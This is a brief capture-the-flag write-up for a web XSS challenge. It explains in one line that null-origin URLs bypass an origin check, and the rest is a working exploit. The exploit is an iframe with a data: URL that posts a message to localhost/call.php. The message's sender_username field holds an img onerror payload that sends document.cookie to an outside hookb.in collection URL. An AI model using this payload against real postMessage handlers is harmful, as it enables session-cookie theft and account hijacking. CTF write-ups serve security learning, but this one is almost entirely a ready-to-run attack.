Tags: web xss 

Rating:

There is bug in origin validation function. URLs with null origin can bypass it.
```
<html>
<iframe src="data:text/html,<script>var call_window;call_window = window.open('http://localhost/call.php');setTimeout(function(){
call_window.postMessage({
type: 'audio',
details: {
sender_username: "<img src=xx: onerror=window.open('https://hookb.in/ZdNNDQ6X?a='+document.cookie)>",
sender_team_name: 'zzzz',
receiver_username: 'test',
receiver_team_name: 'test'
}
}, '*');}, 1000);</script>"></iframe>
</html>
```